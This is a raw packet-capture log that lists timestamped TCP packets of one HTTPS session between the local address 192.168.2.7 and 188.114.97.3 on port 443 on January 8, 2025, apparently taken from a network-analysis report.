                                                      Jan 8, 2025 13:55:11.452938080 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452945948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452991962 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.453572035 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.453592062 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.453666925 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.453677893 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.453726053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.456742048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.456760883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.456815004 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.456824064 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.456877947 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.490807056 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.490823030 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.490883112 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.490900040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.490916014 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.491018057 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.491410971 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.491425991 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.491482973 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.491491079 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.491543055 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.513943911 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.513962030 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.514035940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.514051914 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.514125109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.544677019 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.544696093 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.544780016 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.544791937 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.544842005 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.545098066 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.545113087 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.545181036 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.545190096 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.545241117 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.545468092 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.545483112 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.545548916 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.545557976 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.545617104 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.546581030 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.546597958 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.546658993 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.546669960 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.546715975 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.549133062 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.549149990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.549237967 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.549247026 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.549299955 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.583383083 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.583405018 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.583482027 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.583493948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.583542109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.583791018 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.583806992 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.583872080 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.583878994 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.583942890 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.606573105 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.606590033 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.606672049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.606688023 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.606779099 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.638493061 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.638510942 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.638587952 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.638597965 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.638639927 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.638998985 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639014959 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639086962 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.639095068 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639136076 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.639337063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639352083 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639394045 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.639401913 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639435053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.639453888 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.639774084 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639787912 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639853954 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.639864922 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.639918089 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.641618967 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.641643047 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.641706944 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.641716003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.641758919 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.675918102 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.675935030 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.676019907 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.676034927 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.676083088 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.676409006 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.676424980 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.676506996 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.676516056 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.676636934 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.699007034 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.699023962 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.699095011 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.699103117 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.699147940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.731626034 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731643915 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731731892 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731733084 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.731746912 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731774092 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731779099 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.731807947 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.731812954 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731841087 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.731857061 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.731911898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731924057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.731996059 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.732002974 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.732049942 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.732347012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.732361078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.732414007 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.732422113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.732461929 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.734123945 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.734138012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.734210968 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.734219074 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.734261036 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.768456936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.768471956 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.768528938 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.768538952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.768572092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.768590927 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.768888950 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.768904924 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.768965960 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.768975973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.769018888 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.791429996 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.791444063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.791501045 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.791510105 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.791568041 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830636024 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830653906 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830710888 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830722094 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830760002 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830777884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830779076 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830800056 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830838919 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830853939 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830869913 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830885887 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830893993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830904961 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830938101 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830945015 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.830951929 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.830988884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.831002951 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.831012964 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.831046104 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.831065893 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.831090927 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.831105947 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.831147909 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.831156015 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.831192017 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.860956907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.860979080 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.861057043 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.861067057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.861115932 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.861357927 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.861372948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.861433029 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.861440897 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.861495018 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.884005070 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.884025097 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.884093046 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.884107113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.884165049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.916312933 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.916332006 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.916435003 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.916460991 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.916506052 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.916663885 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.916682005 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.916749001 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.916763067 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.916807890 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.917184114 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.917200089 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.917254925 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.917263031 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.917304993 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.917680025 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.917696953 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.917753935 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.917767048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.917819977 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.922810078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.922827005 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.922882080 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.922890902 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.922951937 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.953696012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.953716040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.953783989 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.953803062 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.953825951 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.953864098 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.953880072 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.953898907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.953948021 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.976468086 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.976484060 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.976558924 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.976572037 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.976605892 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.976627111 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.008738041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.008764029 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.008820057 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.008831024 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.008873940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.009232044 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.009251118 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.009309053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.009316921 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.009365082 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.009756088 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.009771109 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.009829044 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.009838104 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.009885073 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.010154963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.010170937 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.010230064 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.010237932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.010281086 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.015119076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.015135050 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.015194893 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.015202045 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.015247107 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.046061993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.046078920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.046158075 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.046165943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.046211004 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.046335936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.046350956 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.046412945 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.046418905 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.046471119 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102255106 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102278948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102348089 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102365971 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102408886 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102555990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102576017 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102615118 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102622032 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102648020 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102689981 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102757931 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102776051 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102827072 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102833986 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.102866888 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.102886915 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.104233980 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.104253054 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.104310036 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.104317904 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.104362965 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.104811907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.104831934 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.104901075 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.104908943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.104968071 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.109390020 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.109411001 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.109452963 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.109461069 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.109505892 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.109527111 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.140295029 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.140321016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.140408993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.140443087 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.140444994 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.140465021 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.140489101 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.140666008 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.194669962 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.194685936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.194807053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.194807053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.194829941 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.194905043 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.195668936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.195687056 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.195843935 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.195868969 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.195877075 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.195914984 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.196003914 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.196021080 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.196043015 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.196116924 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.196124077 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.196151972 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.196172953 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.196245909 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.196254969 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.196285009 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.200651884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.200666904 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.200756073 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.200756073 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.200766087 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.230783939 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.230803967 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.230933905 CET49706443192.168.2.7188.114.97.3
